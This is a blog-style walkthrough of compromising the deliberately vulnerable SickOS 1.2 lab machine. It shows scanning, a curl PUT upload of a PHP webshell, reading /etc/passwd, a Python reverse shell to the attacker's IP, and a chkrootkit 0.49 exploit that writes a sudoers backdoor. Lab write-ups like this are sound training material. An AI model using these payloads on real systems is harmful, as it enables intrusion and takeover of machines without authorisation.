SickOS 2 is also a vulnerable machine from vulnhub and can be downloaded here: https://www.vulnhub.com/entry/sickos-12,144/

To start of the machine I had to use NMAP again to get its IP address since netdiscover didn’t found the machine. First we run NMAP to see what ports are open:

So we got port 22 and 80, lets see what is on the webpage.

Another weird webpage. There is also nothing interesting in the sourcecode:

<html>

<img src="blow.jpg">

</html>

So lets run Dirb to get some directories and run nikto as well.

root@pentest:~# dirb http://192.168.229.131 /usr/share/dirb/wordlists/big.txt 
-----------------
DIRB v2.22    
By The Dark Raver
-----------------
START_TIME: Thu Jan 16 18:43:19 2020
URL_BASE: http://192.168.229.131/
WORDLIST_FILES: /usr/share/dirb/wordlists/big.txt
-----------------
GENERATED WORDS: 20458                                                         
---- Scanning URL: http://192.168.229.131/ ----
==> DIRECTORY: http://192.168.229.131/test/                                                                                                                                           
+ http://192.168.229.131/~sys~ (CODE:403|SIZE:345)                                                                                                                                                                                                                                                                                                          
---- Entering directory: http://192.168.229.131/test/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)                                                                    
-----------------
END_TIME: Thu Jan 16 18:44:01 2020
DOWNLOADED: 20458 - FOUND: 1

A directory test, nothing interesting in there, it is empty. So lets have a look to the nikto results:

root@pentest:~# nikto -host http://192.168.229.131
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          192.168.229.131
+ Target Hostname:    192.168.229.131
+ Target Port:        80
+ Start Time:         2020-01-16 18:40:17 (GMT1)
---------------------------------------------------------------------------
+ Server: lighttpd/1.4.28
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ All CGI directories 'found', use '-C none' to test none
+ Retrieved x-powered-by header: PHP/5.3.10-1ubuntu3.21
+ 26545 requests: 0 error(s) and 4 item(s) reported on remote host
+ End Time:           2020-01-16 18:41:28 (GMT1) (71 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

Nothing interesting in here either, hmmm. So I googled a bit and found an idea to curl the webpages to see what methods can be used since there might be a method allowed which can be misused. Interesting read(pdf file from sans) for dangerous HTTP methods: Link

Here we see that we can use the PUT method to upload files. But how do we do this? Lets google 😀 https://stackoverflow.com/questions/5143915/test-file-upload-using-http-put-method/49730009. Doesn’t seem to hard we can use curl http://myservice --upload-file file.txt

To find the simple-backdoor.php I always use the command: # locate webshell. The one I want can be found in /usr/share/webshells/php/php-reverse-shell.php. Lets copy this file with cp /usr/share/webshells/php/php-reverse-shell.php ~

Lets read the content of the reverse shell and edit anything that we need to edit. We have to edit the IP to the IP of our kali machine and we can keep the port. It looks like the following:

Well uploading it with the command above didn’t work. Lets try the others from the website

hmm didn’t work either, same error. However I can upload a empty text file, but not a file with text in it.

After fooling around the following worked:

curl -X PUT -d '<?php if(isset($_REQUEST['cmd'])){ echo "<pre>"; $cmd = ($_REQUEST['cmd']); system($cmd); echo "</pre>"; die; }?>' http://192.168.229.131/test/shell.php

Lets open the webshell. By doing http://192.168.229.131/test/shell.php?cmd=command we can execute commands. Lets have a look around and see what we can find:

# http://192.168.229.131/test/shell.php?cmd=uname -a
Linux ubuntu 3.11.0-15-generic #25~precise1-Ubuntu SMP Thu Jan 30 17:42:40 UTC 2014 i686 athlon i386 GNU/Linux

# http://192.168.229.131/test/shell.php?cmd=id
uid=33(www-data) gid=33(www-data) groups=33(www-data)

# http://192.168.229.131/test/shell.php?cmd=cat%20../../../../../../../etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
libuuid:x:100:101::/var/lib/libuuid:/bin/sh
syslog:x:101:103::/home/syslog:/bin/false
messagebus:x:102:104::/var/run/dbus:/bin/false
john:x:1000:1000:Ubuntu 12.x,,,:/home/john:/bin/bash
sshd:x:103:65534::/var/run/sshd:/usr/sbin/nologin

# http://192.168.229.131/test/shell.php?cmd=python%20-h
usage: python [option] ... [-c cmd | -m mod | file | -] [arg] ...
Options and arguments (and corresponding environment variables):
--snip--

We can use python to create a reverse shell. Lets try since this webshell is shit. I always use this for easy reference http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet

We can use the following code to make a reverse shell

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.229.129",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

But first we need to listen on port 1233, which we can do with: nc -lvp 1234. Lets try…. FAILED. Well lets try again but use a better port? 443 probably since the webserver doesn’t use it. And we got a reverse connection:

Seems like a limited shell, I googled some shell breaks and the following worked python -c 'import pty;pty.spawn("/bin/bash")' Nice we got a somewhat normal shell. This is easier to work with. Lets look around for a privilege escalation.

To help me with the priv escalation I wanted to use a script for my first time. Lets use Unix-privesc-check and see if it works. To transfer this file we can copy it to /var/www/html and start our apache with service apache2 start. Then we can download it on the machine using wget http://192.168.229.129/upc.sh

For some reason it doesn’t download it, we can also not use git. Lets just have a manual search like usual. Some interesting info:
– John is in the sudoers group

After looking around for a while I found that chkrootkit was installed, I checked his version and it is version 0.49, that seems old.
www-data@ubuntu:/etc/cron.daily$ chkrootkit -V

There is an exploit for it:

Contents of 33899.txt

Steps to reproduce:

- Put an executable file named 'update' with non-root owner in /tmp (not
mounted noexec, obviously)
- Run chkrootkit (as uid 0)

Result: The file /tmp/update will be executed as root, thus effectively
rooting your box, if malicious content is placed inside the file.

If an attacker knows you are periodically running chkrootkit (like in
cron.daily) and has write access to /tmp (not mounted noexec), he may
easily take advantage of this.

So to reproduce this we have to put an executable file in /tmp named update which will be ran by chkrootkit. So lets make an executable file, i did some googling and we could just change the password of root with: echo -e "test\ntest" | passwd

So lets use the following command to echo this to update echo 'echo -e "test\ntest" | passwd' > update and then we have to give the permissions. Just made it easy to 777 chmod 777 update. Lets wait a couple minutes and see if we can ssh as root. This did not work, seems like it didn’t change the password. I googled and echoed the following code in the update file: echo 'chmod 777 /etc/sudoers && echo "www-data ALL=NOPASSWD: ALL" >> /etc/sudoers && chmod 440 /etc/sudoers' > update

This will add the www-data user to the sudoers file, allowing us to change to the root user.

Lets cat the flag so we are done with this machine:

Leave a Reply

Your email address will not be published. Required fields are marked *